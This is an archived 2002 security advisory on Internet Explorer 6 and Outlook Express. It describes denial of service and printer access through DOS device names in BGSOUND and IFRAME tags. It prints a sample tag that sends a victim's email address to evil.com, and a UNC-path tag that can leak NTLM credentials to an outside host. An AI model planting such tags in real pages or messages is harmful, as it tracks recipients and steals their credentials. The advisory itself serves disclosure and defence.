Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Browsers :: expl5347.htm

Internet Explorer/Outlook Express Special Device Access/DoS



16th May 2002 [SBWID-5347]
COMMAND

	Special   device   access   and   DoS   in   Internet    Exporer/Outlook
	Express/Outlook

SYSTEMS AFFECTED

	Internet Explorer 6.0

PROBLEM

	In ERRor & 3APA3A advisory :
	

	http://www.security.nnov.ru/advisories/msiedos.asp

	

	

	All versions of Windows have a reserved filenames  referred  to  special
	devices such as prn, aux, nul, etc also  called  DOS  devices.  Filename
	for special device may have any directory path and any  extension  after
	dot. For example c:\\temp\\prn.tmp refers to prn device. Same API  is  used
	to access special device  and  regular  files.  Unauthorized  access  to
	special device may  be  significant  security  issue  causing  different
	results: from Denial of Service against running program  or  service  to
	hardware failure or secure data compromise.
	

	 Problem:

	 ========

	 

	ERRor discovered that <BGSOUND> tag in conjunction with special  device
	name causes DoS against Internet Explorer or Outlook Express  regardless
	of security zone  settings.  For  Outlook  Express  it\'s  untrivial  to
	remove malcrafted  message  without losing message folder.
	

	During investigation of this issue it was  found  by  3APA3A  and  ERRor
	that using <IFRAME> tag it\'s possible to send any  data  to  special
	device.
	

	Another problem is that regardless  of  security  zone  settings  source
	specified  in  <BGSOUND>  tag  is  always  downloaded.  It  makes  it
	possible to fingerprint remote client by his e-mail using  something  like
	 

	<bgsound src=3D\"http://evil.com/registerme?email=3Dvictim@com.com\">

	

	Remote client fingerprint problem is discussed in [4].
	

	

	 Exploitation:

	 =============

	

	You can use [2] to test DoS against Outlook Express  via  <BGSOUND>.=20
	[3] will print text line on a text printer,  attached  to  LPT1,  (in  =
	Outlook Express 6.0) via <IFRAME>
	 

	1. Special device access and DoS in Outlook Express

	   http://www.security.nnov.ru/search/news.asp?binid=3D2010

	2. Outlook Express Special Device DoS POC

	   http://www.security.nnov.ru/files/iedos/dos.eml

	3. Outlook Express Special Device access POC

	   http://www.security.nnov.ru/files/iedos/print.eml

	4. Security risks assoticated with using e-mail.

	   http://www.security.nnov.ru/articles/uninet/

	

	

	

	 Update (21 May 2002)

	 ======

	

	Chad          Loder           added           that           <bgsound
	src=3D\"\\\\111.111.111.111\\new\\file.wav\">  causes  IE   to   connect
	to   111.111.111.111   via   NetBT.   Depending   on   LMCompatibilityLevel
	it may cause user\'s cleartext password or NTLMv1 challenge to leak.  It\'s
	very serious bug.

SOLUTION

	None to our knowledge, however if a patch is  posted  it  will  probalby
	find it\'s way there :
	

	http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-023.asp

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH